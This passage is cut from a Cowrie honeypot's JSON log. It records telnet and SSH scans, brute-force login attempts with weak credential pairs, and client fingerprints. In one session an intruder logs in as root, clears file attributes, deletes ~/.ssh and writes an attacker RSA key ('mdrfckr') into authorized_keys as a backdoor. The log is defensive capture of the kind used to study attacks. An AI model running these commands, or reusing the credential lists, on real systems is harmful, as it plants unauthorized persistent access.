message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:48:06.553751Z","src_ip":"212.227.235.229","session":"37910d5b8ac2"}
{"eventid":"cowrie.login.failed","username":"sandy","password":"sandy","message":"login attempt [sandy/sandy] failed","sensor":"my-vps","timestamp":"2025-08-26T03:48:07.582576Z","src_ip":"212.227.235.229","session":"37910d5b8ac2"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:08.834055Z","src_ip":"212.227.235.229","session":"37910d5b8ac2"}
{"eventid":"cowrie.session.closed","duration":12.807692050933838,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:09.088253Z","src_ip":"182.119.161.105","session":"d83f37d08301"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":57459,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ea45c9ae1fd","protocol":"telnet","message":"New connection: 182.119.161.105:57459 (1.2.3.4:23) [session: 7ea45c9ae1fd]","sensor":"my-vps","timestamp":"2025-08-26T03:48:09.234055Z"}
{"eventid":"cowrie.session.closed","duration":12.848317623138428,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:22.082280Z","src_ip":"182.119.161.105","session":"7ea45c9ae1fd"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":57770,"dst_ip":"1.2.3.4","dst_port":23,"session":"53a1730fa253","protocol":"telnet","message":"New connection: 182.119.161.105:57770 (1.2.3.4:23) [session: 53a1730fa253]","sensor":"my-vps","timestamp":"2025-08-26T03:48:22.280415Z"}
{"eventid":"cowrie.session.connect","src_ip":"218.152.53.180","src_port":56735,"dst_ip":"1.2.3.4","dst_port":23,"session":"d31df5ced67a","protocol":"telnet","message":"New connection: 218.152.53.180:56735 (1.2.3.4:23) [session: d31df5ced67a]","sensor":"my-vps","timestamp":"2025-08-26T03:48:25.678277Z"}
{"eventid":"cowrie.session.closed","duration":12.81456208229065,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:35.094881Z","src_ip":"182.119.161.105","session":"53a1730fa253"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":58061,"dst_ip":"1.2.3.4","dst_port":23,"session":"ad10cecc23ae","protocol":"telnet","message":"New connection: 182.119.161.105:58061 (1.2.3.4:23) [session: ad10cecc23ae]","sensor":"my-vps","timestamp":"2025-08-26T03:48:35.299110Z"}
{"eventid":"cowrie.session.closed","duration":13.140218257904053,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:38.818403Z","src_ip":"218.152.53.180","session":"d31df5ced67a"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:40.142172Z","src_ip":"212.227.235.229","session":"8f8414240293"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41673,"dst_ip":"1.2.3.4","dst_port":23,"session":"50b5e07dccbe","protocol":"telnet","message":"New connection: 212.227.235.229:41673 (1.2.3.4:23) [session: 50b5e07dccbe]","sensor":"my-vps","timestamp":"2025-08-26T03:48:43.364017Z"}
{"eventid":"cowrie.session.closed","duration":12.783453226089478,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:48.082490Z","src_ip":"182.119.161.105","session":"ad10cecc23ae"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":58379,"dst_ip":"1.2.3.4","dst_port":23,"session":"4189978e3dae","protocol":"telnet","message":"New connection: 182.119.161.105:58379 (1.2.3.4:23) [session: 4189978e3dae]","sensor":"my-vps","timestamp":"2025-08-26T03:48:48.235814Z"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":58660,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa6bf0502c1e","protocol":"ssh","message":"New connection: 45.88.8.186:58660 (1.2.3.4:22) [session: aa6bf0502c1e]","sensor":"my-vps","timestamp":"2025-08-26T03:48:54.188455Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T03:48:54.931400Z","src_ip":"45.88.8.186","session":"aa6bf0502c1e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T03:48:54.932117Z","src_ip":"45.88.8.186","session":"aa6bf0502c1e"}
{"eventid":"cowrie.session.closed","duration":12.73311448097229,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:56.097030Z","src_ip":"212.227.235.229","session":"50b5e07dccbe"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":41994,"dst_ip":"1.2.3.4","dst_port":22,"session":"7cff34a4e609","protocol":"ssh","message":"New connection: 68.183.87.241:41994 (1.2.3.4:22) [session: 7cff34a4e609]","sensor":"my-vps","timestamp":"2025-08-26T03:48:56.232322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:48:56.232986Z","src_ip":"68.183.87.241","session":"7cff34a4e609"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41870,"dst_ip":"1.2.3.4","dst_port":23,"session":"bd76408660ab","protocol":"telnet","message":"New connection: 212.227.235.229:41870 (1.2.3.4:23) [session: bd76408660ab]","sensor":"my-vps","timestamp":"2025-08-26T03:48:56.376867Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:48:56.509256Z","src_ip":"68.183.87.241","session":"7cff34a4e609"}
{"eventid":"cowrie.login.success","username":"root","password":"123QWE!@#","message":"login attempt [root/123QWE!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:48:57.355056Z","src_ip":"45.88.8.186","session":"aa6bf0502c1e"}
{"eventid":"cowrie.login.failed","username":"monitor","password":"123456","message":"login attempt [monitor/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T03:48:57.654333Z","src_ip":"68.183.87.241","session":"7cff34a4e609"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:57.984978Z","src_ip":"45.88.8.186","session":"aa6bf0502c1e"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:48:58.933086Z","src_ip":"68.183.87.241","session":"7cff34a4e609"}
{"eventid":"cowrie.session.closed","duration":12.844751119613647,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:01.079469Z","src_ip":"182.119.161.105","session":"4189978e3dae"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":58691,"dst_ip":"1.2.3.4","dst_port":23,"session":"a5b5902a6d41","protocol":"telnet","message":"New connection: 182.119.161.105:58691 (1.2.3.4:23) [session: a5b5902a6d41]","sensor":"my-vps","timestamp":"2025-08-26T03:49:01.229184Z"}
{"eventid":"cowrie.session.closed","duration":13.68979001045227,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:10.066580Z","src_ip":"212.227.235.229","session":"bd76408660ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39017,"dst_ip":"1.2.3.4","dst_port":23,"session":"abb8557b3fc6","protocol":"telnet","message":"New connection: 212.227.125.160:39017 (1.2.3.4:23) [session: abb8557b3fc6]","sensor":"my-vps","timestamp":"2025-08-26T03:49:10.170761Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42092,"dst_ip":"1.2.3.4","dst_port":23,"session":"7322f535f7a1","protocol":"telnet","message":"New connection: 212.227.235.229:42092 (1.2.3.4:23) [session: 7322f535f7a1]","sensor":"my-vps","timestamp":"2025-08-26T03:49:10.293720Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41946,"dst_ip":"1.2.3.4","dst_port":23,"session":"004305d8c691","protocol":"telnet","message":"New connection: 212.227.235.229:41946 (1.2.3.4:23) [session: 004305d8c691]","sensor":"my-vps","timestamp":"2025-08-26T03:49:11.095827Z"}
{"eventid":"cowrie.session.closed","duration":12.848693609237671,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:14.077768Z","src_ip":"182.119.161.105","session":"a5b5902a6d41"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":58998,"dst_ip":"1.2.3.4","dst_port":23,"session":"85c0a8ec9221","protocol":"telnet","message":"New connection: 182.119.161.105:58998 (1.2.3.4:23) [session: 85c0a8ec9221]","sensor":"my-vps","timestamp":"2025-08-26T03:49:14.305606Z"}
{"eventid":"cowrie.session.closed","duration":12.403939723968506,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:22.574611Z","src_ip":"212.227.125.160","session":"abb8557b3fc6"}
{"eventid":"cowrie.session.connect","src_ip":"103.217.145.104","src_port":58066,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc7fcbe85dc6","protocol":"ssh","message":"New connection: 103.217.145.104:58066 (1.2.3.4:22) [session: dc7fcbe85dc6]","sensor":"my-vps","timestamp":"2025-08-26T03:49:23.432333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:49:23.433439Z","src_ip":"103.217.145.104","session":"dc7fcbe85dc6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:49:23.694505Z","src_ip":"103.217.145.104","session":"dc7fcbe85dc6"}
{"eventid":"cowrie.session.closed","duration":13.92556643486023,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:24.219218Z","src_ip":"212.227.235.229","session":"7322f535f7a1"}
{"eventid":"cowrie.login.failed","username":"snarkos","password":"123456","message":"login attempt [snarkos/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T03:49:24.784719Z","src_ip":"103.217.145.104","session":"dc7fcbe85dc6"}
{"eventid":"cowrie.session.closed","duration":13.994714260101318,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:25.090463Z","src_ip":"212.227.235.229","session":"004305d8c691"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:26.049340Z","src_ip":"103.217.145.104","session":"dc7fcbe85dc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42376,"dst_ip":"1.2.3.4","dst_port":23,"session":"923eaa7aac91","protocol":"telnet","message":"New connection: 212.227.235.229:42376 (1.2.3.4:23) [session: 923eaa7aac91]","sensor":"my-vps","timestamp":"2025-08-26T03:49:26.460135Z"}
{"eventid":"cowrie.session.closed","duration":12.798874616622925,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:27.104411Z","src_ip":"182.119.161.105","session":"85c0a8ec9221"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":59324,"dst_ip":"1.2.3.4","dst_port":23,"session":"fe872e3229db","protocol":"telnet","message":"New connection: 182.119.161.105:59324 (1.2.3.4:23) [session: fe872e3229db]","sensor":"my-vps","timestamp":"2025-08-26T03:49:27.255806Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58032,"dst_ip":"1.2.3.4","dst_port":22,"session":"56df2278016b","protocol":"ssh","message":"New connection: 212.227.235.229:58032 (1.2.3.4:22) [session: 56df2278016b]","sensor":"my-vps","timestamp":"2025-08-26T03:49:32.860395Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:49:32.861261Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:49:34.793609Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.login.success","username":"root","password":"penis123","message":"login attempt [root/penis123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:49:35.525155Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:49:36.038908Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:49:36.039844Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:49:36.041107Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:36.286771Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:49:36.886842Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:49:36.887696Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:49:37.133433Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:37.134314Z","src_ip":"212.227.235.229","session":"56df2278016b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42740,"dst_ip":"1.2.3.4","dst_port":22,"session":"1a21e7e16a3b","protocol":"ssh","message":"New connection: 212.227.235.229:42740 (1.2.3.4:22) [session: 1a21e7e16a3b]","sensor":"my-vps","timestamp":"2025-08-26T03:49:37.378417Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:49:37.379121Z","src_ip":"212.227.235.229","session":"1a21e7e16a3b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:49:37.624355Z","src_ip":"212.227.235.229","session":"1a21e7e16a3b"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:49:38.649052Z","src_ip":"212.227.235.229","session":"1a21e7e16a3b"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:39.897324Z","src_ip":"212.227.235.229","session":"1a21e7e16a3b"}
{"eventid":"cowrie.session.closed","duration":12.828460454940796,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:40.084202Z","src_ip":"182.119.161.105","session":"fe872e3229db"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42748,"dst_ip":"1.2.3.4","dst_port":22,"session":"34b33e7e51d0","protocol":"ssh","message":"New connection: 212.227.235.229:42748 (1.2.3.4:22) [session: 34b33e7e51d0]","sensor":"my-vps","timestamp":"2025-08-26T03:49:40.145384Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:49:40.146276Z","src_ip":"212.227.235.229","session":"34b33e7e51d0"}
{"eventid":"cowrie.session.closed","duration":13.761101961135864,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:49:40.221128Z","src_ip":"212.227.235.229","session":"923eaa7aac91"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":59640,"dst_ip":"1.2.3.4","dst_port":23,"session":"a670cd05b0d8","protocol":"telnet","message":"New connection: 182.119.161.105:59640 (1.2.3.4:23) [session: a670cd05b0d8]","sensor":"my-vps","timestamp":"2025-08-26T03:49:40.271362Z"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 